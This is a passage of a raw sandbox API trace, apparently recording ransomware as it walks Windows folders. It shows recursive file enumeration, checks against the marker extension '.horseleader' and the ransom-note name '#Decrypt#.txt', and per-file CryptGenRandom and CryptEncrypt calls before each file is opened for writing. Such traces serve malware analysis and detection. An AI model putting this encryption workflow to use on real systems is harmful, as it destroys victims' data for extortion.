ftCreationTime.dwLowDateTime=0x8f47ab01, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f47ab01, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f47ab01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0231.845] lstrcmpiW (lpString1="keypad.xml", lpString2="Windows") returned -1 [0231.845] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 79 [0231.845] StrStrIW (lpFirst="keypad.xml", lpSrch=".horseleader") returned 0x0 [0231.845] lstrcmpW (lpString1="keypad.xml", lpString2="#Decrypt#.txt") returned 1 [0231.845] lstrcmpW (lpString1="keypad.xml", lpString2="_uninstalling_.png") returned 1 [0231.845] lstrlenW (lpString=".testttjffg") returned 11 [0231.845] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpSrch=".testttjffg") returned 0x0 [0231.845] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.845] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.845] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.857] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="main", cAlternateFileName="")) returned 1 [0231.857] lstrcmpiW (lpString1="main", lpString2="Windows") returned -1 [0231.857] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 73 [0231.857] lstrcmpW (lpString1="main", lpString2=".") returned 1 [0231.858] lstrcmpW (lpString1="main", lpString2="..") returned 1 [0231.858] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.858] GetProcessHeap () returned 0x780000 [0231.858] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0231.858] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*") returned 75 [0231.858] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0231.877] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.881] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\.") returned 75 [0231.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.881] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0231.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.881] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\..") returned 76 [0231.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.881] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f643b69, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f643b69, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc4e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base.xml", cAlternateFileName="")) returned 1 [0231.881] lstrcmpiW (lpString1="base.xml", lpString2="Windows") returned -1 [0231.881] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 82 [0231.881] StrStrIW (lpFirst="base.xml", lpSrch=".horseleader") returned 0x0 [0231.881] lstrcmpW (lpString1="base.xml", lpString2="#Decrypt#.txt") returned 1 [0231.881] lstrcmpW (lpString1="base.xml", lpString2="_uninstalling_.png") returned 1 [0231.881] lstrlenW (lpString=".testttjffg") returned 11 [0231.881] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpSrch=".testttjffg") returned 0x0 [0231.881] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.882] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.946] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf7, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="baseAltGr_rtl.xml", cAlternateFileName="")) returned 1 [0231.946] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="Windows") returned -1 [0231.946] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 91 [0231.947] StrStrIW (lpFirst="baseAltGr_rtl.xml", lpSrch=".horseleader") returned 0x0 [0231.947] lstrcmpW (lpString1="baseAltGr_rtl.xml", lpString2="#Decrypt#.txt") returned 1 [0231.947] lstrcmpW (lpString1="baseAltGr_rtl.xml", lpString2="_uninstalling_.png") returned 1 [0231.947] lstrlenW (lpString=".testttjffg") returned 11 [0231.947] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpSrch=".testttjffg") returned 0x0 [0231.947] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.947] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.948] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.948] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc59, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_altgr.xml", cAlternateFileName="")) returned 1 [0231.948] lstrcmpiW (lpString1="base_altgr.xml", lpString2="Windows") returned -1 [0231.948] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 88 [0231.948] StrStrIW (lpFirst="base_altgr.xml", lpSrch=".horseleader") returned 0x0 [0231.948] lstrcmpW (lpString1="base_altgr.xml", lpString2="#Decrypt#.txt") returned 1 [0231.948] lstrcmpW (lpString1="base_altgr.xml", lpString2="_uninstalling_.png") returned 1 [0231.948] lstrlenW (lpString=".testttjffg") returned 11 [0231.948] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpSrch=".testttjffg") returned 0x0 [0231.948] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.948] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.948] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.162] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f669cc7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc5e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_ca.xml", cAlternateFileName="")) returned 1 [0232.162] lstrcmpiW (lpString1="base_ca.xml", lpString2="Windows") returned -1 [0232.162] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 85 [0232.182] StrStrIW (lpFirst="base_ca.xml", lpSrch=".horseleader") returned 0x0 [0232.237] lstrcmpW (lpString1="base_ca.xml", lpString2="#Decrypt#.txt") returned 1 [0232.237] lstrcmpW (lpString1="base_ca.xml", lpString2="_uninstalling_.png") returned 1 [0232.237] lstrlenW (lpString=".testttjffg") returned 11 [0232.237] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpSrch=".testttjffg") returned 0x0 [0232.237] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.237] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.238] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cdbf2a, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cdbf2a, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_heb.xml", cAlternateFileName="")) returned 1 [0232.238] lstrcmpiW (lpString1="base_heb.xml", lpString2="Windows") returned -1 [0232.238] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 86 [0232.238] StrStrIW (lpFirst="base_heb.xml", lpSrch=".horseleader") returned 0x0 [0232.238] lstrcmpW (lpString1="base_heb.xml", lpString2="#Decrypt#.txt") returned 1 [0232.238] lstrcmpW (lpString1="base_heb.xml", lpString2="_uninstalling_.png") returned 1 [0232.238] lstrlenW (lpString=".testttjffg") returned 11 [0232.238] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpSrch=".testttjffg") returned 0x0 [0232.238] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.239] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.239] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.480] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_jpn.xml", cAlternateFileName="")) returned 1 [0232.480] lstrcmpiW (lpString1="base_jpn.xml", lpString2="Windows") returned -1 [0232.480] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 86 [0232.480] StrStrIW (lpFirst="base_jpn.xml", lpSrch=".horseleader") returned 0x0 [0232.480] lstrcmpW (lpString1="base_jpn.xml", lpString2="#Decrypt#.txt") returned 1 [0232.480] lstrcmpW (lpString1="base_jpn.xml", lpString2="_uninstalling_.png") returned 1 [0232.481] lstrlenW (lpString=".testttjffg") returned 11 [0232.481] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpSrch=".testttjffg") returned 0x0 [0232.481] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.485] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.485] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e8, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_kor.xml", cAlternateFileName="")) returned 1 [0232.486] lstrcmpiW (lpString1="base_kor.xml", lpString2="Windows") returned -1 [0232.486] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 86 [0232.486] StrStrIW (lpFirst="base_kor.xml", lpSrch=".horseleader") returned 0x0 [0232.486] lstrcmpW (lpString1="base_kor.xml", lpString2="#Decrypt#.txt") returned 1 [0232.486] lstrcmpW (lpString1="base_kor.xml", lpString2="_uninstalling_.png") returned 1 [0232.486] lstrlenW (lpString=".testttjffg") returned 11 [0232.486] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpSrch=".testttjffg") returned 0x0 [0232.486] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.486] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.491] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d281e4, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d281e4, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x269, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_rtl.xml", cAlternateFileName="")) returned 1 [0232.493] lstrcmpiW (lpString1="base_rtl.xml", lpString2="Windows") returned -1 [0232.493] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 86 [0232.493] StrStrIW (lpFirst="base_rtl.xml", lpSrch=".horseleader") returned 0x0 [0232.493] lstrcmpW (lpString1="base_rtl.xml", lpString2="#Decrypt#.txt") returned 1 [0232.493] lstrcmpW (lpString1="base_rtl.xml", lpString2="_uninstalling_.png") returned 1 [0232.493] lstrlenW (lpString=".testttjffg") returned 11 [0232.494] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpSrch=".testttjffg") returned 0x0 [0232.494] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.494] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.504] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.504] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4e341, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d4e341, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6dc0e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x40e8, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ja-jp.xml", cAlternateFileName="")) returned 1 [0232.971] lstrcmpiW (lpString1="ja-jp.xml", lpString2="Windows") returned -1 [0232.971] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 83 [0232.971] StrStrIW (lpFirst="ja-jp.xml", lpSrch=".horseleader") returned 0x0 [0232.971] lstrcmpW (lpString1="ja-jp.xml", lpString2="#Decrypt#.txt") returned 1 [0232.971] lstrcmpW (lpString1="ja-jp.xml", lpString2="_uninstalling_.png") returned 1 [0232.971] lstrlenW (lpString=".testttjffg") returned 11 [0232.971] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpSrch=".testttjffg") returned 0x0 [0232.971] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.971] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.079] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7449e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d7449e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f70223f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3af9, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ko-kr.xml", cAlternateFileName="")) returned 1 [0233.079] lstrcmpiW (lpString1="ko-kr.xml", lpString2="Windows") returned -1 [0233.079] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 83 [0233.079] StrStrIW (lpFirst="ko-kr.xml", lpSrch=".horseleader") returned 0x0 [0233.079] lstrcmpW (lpString1="ko-kr.xml", lpString2="#Decrypt#.txt") returned 1 [0233.079] lstrcmpW (lpString1="ko-kr.xml", lpString2="_uninstalling_.png") returned 1 [0233.079] lstrlenW (lpString=".testttjffg") returned 11 [0233.080] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpSrch=".testttjffg") returned 0x0 [0233.080] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.080] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.080] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.080] 